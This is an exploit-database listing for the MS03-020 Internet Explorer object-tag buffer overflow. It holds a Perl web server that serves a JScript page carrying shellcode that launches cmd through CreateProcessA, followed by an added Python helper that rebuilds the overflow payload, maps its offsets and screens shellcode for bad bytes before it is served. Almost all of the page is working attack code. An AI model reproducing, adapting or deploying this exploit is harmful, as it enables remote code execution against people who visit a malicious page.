0day.today - Biggest Exploit Database in the World.
MS Internet Explorer Object Tag Exploit (MS03-020)

```perl
#!/usr/bin/perl
#
# Proof of concept exploit on IE 5.x - 6.x by Alumni
# IE-Object longtype dynamic call overflow
#
# url://<$shellcode><'/'x48><jmp %ptr_sh>
# the flaw actually exists in URLMON.DLL when converting backslashes
# to wide char, this can be seen on stack dump near '&CLSID=AAA...2F__2F__...'.
#
# To exploit: i)  start server perl script;
#             ii) connect to http-service using IE/5.x.
#   a) the shellcode size is limited up to 56 bytes;
#   b) the '$ret' may differ as well as the image base of KERNEL32.DLL;
#   c) to avoid multiple encoding the shellcode is given 'as is' with help of JScript.
#
use strict;
use warnings;
use IO::Socket;

my $port   = 80;
my $server = IO::Socket::INET->new(
    LocalPort => $port,
    Type      => SOCK_STREAM,
    Reuse     => 1,
    Listen    => $port,            # listen backlog; any small value works
) or die("Couldn't create server socket\n");

my $shellcode =
    "\x33\xdb".                    # xor ebx, ebx
    "\x8b\xd4".                    # mov edx, esp
    "\x80\xc6\xff".                # add dh, 0xFF
    "\xc7\x42\xfc\x63\x6d".        # mov dword ptr [edx-4], 0x01646D63 ("cmd\x01")
    "\x64\x01".                    #   (remaining two bytes of that immediate)
    "\x88\x5a\xff".                # mov byte ptr [edx-1], bl
    "\x8d\x42\xfc".                # lea eax, [edx-4]
    "\x8b\xf5".                    # mov esi, ebp
    "\x56\x52".                    # push esi; push edx
    "\x53\x53\x53\x53\x53\x53".    # push ebx (x6)
    "\x50\x53".                    # push eax; push ebx
    "\xb8\x41\x77\xf7\xbf".        # mov eax, 0xBFF77741 ~= CreateProcessA
    "\xff\xd0".                    # call eax
    "\xb8\xf8\xd4\xf8\xbf".        # mov eax, 0xBFF8D4F8 ~= ExitProcess
    "\xff\xd0".                    # call eax
    "\xcc";                        # int 3

my $nop = "\x90";
my $ret = "\\xAB\\x5D\\x58";       # emitted as a JScript escape, i.e. the bytes AB 5D 58

while (my $client = $server->accept()) {
    while (<$client>) {
        # the empty line ends the request headers; answer with the exploit page
        if ($_ =~ /^(\x0D\x0A)/) {
            print $client <<END_DATA;
HTTP/1.0 200 Ok\r
Content-Type: text/html\r
\r
<script>\r
var mins = 56;\r
var size = 48;\r
var sploit = "$shellcode";\r
var strNop = "$nop";\r
var strObj = '<object type="';\r
for (i=0;i<mins-sploit.length;i++) strObj += strNop;\r
strObj += sploit;\r
for (i=0;i<size;i++) strObj += '/';\r
strObj += "CCCCCCCCDDDDDDDD";\r
strObj += "$ret";\r
strObj += '">Hello</object>';\r
alert(strObj);\r
document.write(strObj);\r
</script>\r
END_DATA
            close($client);
            last;
        }
    }
}
close($server);
```

# 0day.today [2024-07-08] #
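The PoC builds its `type` attribute at run time in JScript, so the only way to see the layout it produces is to run it in IE. The script below is an added example written for this page (not Alumni's code and not part of the original listing): it rebuilds the same attribute value offline in Python, reports the offset of each region, and enforces the two constraints the PoC header states, the 56-byte shellcode limit and the requirement that the shellcode survive being pasted "as is" into a JScript string inside an HTML attribute. The shellcode bytes are copied from the listing; the `BAD_BYTES` set (bytes that would terminate the JScript string or the attribute) is an assumption of this example, not something the PoC spells out.

```python
# Added example (editor's, not part of the original PoC): rebuilds the
# <object type="..."> payload the Perl/JScript above generates so its layout
# and the 56-byte shellcode limit can be checked offline before serving it.

# 47-byte shellcode copied verbatim from the PoC's $shellcode.
SHELLCODE = (
    b"\x33\xdb"                       # xor ebx, ebx
    b"\x8b\xd4"                       # mov edx, esp
    b"\x80\xc6\xff"                   # add dh, 0xFF
    b"\xc7\x42\xfc\x63\x6d\x64\x01"   # mov dword ptr [edx-4], "cmd\x01"
    b"\x88\x5a\xff"                   # mov byte ptr [edx-1], bl
    b"\x8d\x42\xfc"                   # lea eax, [edx-4]
    b"\x8b\xf5"                       # mov esi, ebp
    b"\x56\x52"                       # push esi; push edx
    b"\x53\x53\x53\x53\x53\x53"       # push ebx (x6)
    b"\x50\x53"                       # push eax; push ebx
    b"\xb8\x41\x77\xf7\xbf"           # mov eax, 0xBFF77741 (CreateProcessA per the PoC)
    b"\xff\xd0"                       # call eax
    b"\xb8\xf8\xd4\xf8\xbf"           # mov eax, 0xBFF8D4F8 (ExitProcess per the PoC)
    b"\xff\xd0"                       # call eax
    b"\xcc"                           # int 3
)

MAX_SHELLCODE = 56                # the PoC's 'mins'
SLASH_COUNT = 48                  # the PoC's 'size'
FILLER = b"CCCCCCCCDDDDDDDD"      # 16 marker bytes between the slashes and the return address
RET = b"\xab\x5d\x58"             # what the PoC's JScript "\xAB\x5D\x58" expands to
NOP = b"\x90"

# Assumption (editor's, not from the PoC): bytes that would end or corrupt the
# contexts the raw shellcode travels through, the JScript double-quoted string
# and the HTML attribute value, and so must not appear in it.
BAD_BYTES = frozenset(b'\x00\r\n"\\<>')


def bad_bytes(buf: bytes) -> list:
    """Return the forbidden byte values present in buf, sorted."""
    return sorted(set(buf) & BAD_BYTES)


def build_payload(shellcode: bytes = SHELLCODE, ret: bytes = RET) -> bytes:
    """Reproduce strObj's attribute value: NOP pad, shellcode, slashes, filler, ret."""
    if len(shellcode) > MAX_SHELLCODE:
        raise ValueError(f"shellcode is {len(shellcode)} bytes, limit is {MAX_SHELLCODE}")
    bad = bad_bytes(shellcode)
    if bad:
        raise ValueError("shellcode contains bytes that break the JS/HTML context: "
                         + ", ".join(f"0x{b:02x}" for b in bad))
    return (NOP * (MAX_SHELLCODE - len(shellcode))
            + shellcode
            + b"/" * SLASH_COUNT
            + FILLER
            + ret)


def layout(shellcode: bytes = SHELLCODE) -> dict:
    """Byte offsets of each region, handy when matching the stack dump in a debugger."""
    pad = MAX_SHELLCODE - len(shellcode)
    slashes_end = MAX_SHELLCODE + SLASH_COUNT
    filler_end = slashes_end + len(FILLER)
    return {
        "nop_pad": (0, pad),
        "shellcode": (pad, MAX_SHELLCODE),
        "slashes": (MAX_SHELLCODE, slashes_end),
        "filler": (slashes_end, filler_end),
        "ret": (filler_end, filler_end + len(RET)),
    }


def object_tag(payload: bytes) -> bytes:
    """Wrap the payload exactly as the PoC's strObj does."""
    return b'<object type="' + payload + b'">Hello</object>'


if __name__ == "__main__":
    p = build_payload()
    print(f"{len(SHELLCODE)}-byte shellcode, {len(p)}-byte type attribute")
    for name, (start, end) in layout().items():
        print(f"{name:>10}: [{start:3d}, {end:3d})")
    print(object_tag(p)[:40], b"...")
```

With the PoC's own shellcode the attribute is 123 bytes: 9 NOPs, 47 bytes of shellcode, 48 slashes, the 16-byte marker, then the 3 return-address bytes at offset 120. Replacing the shellcode with anything longer than 56 bytes, or anything containing a quote, backslash, NUL or line break, is rejected before it is ever served.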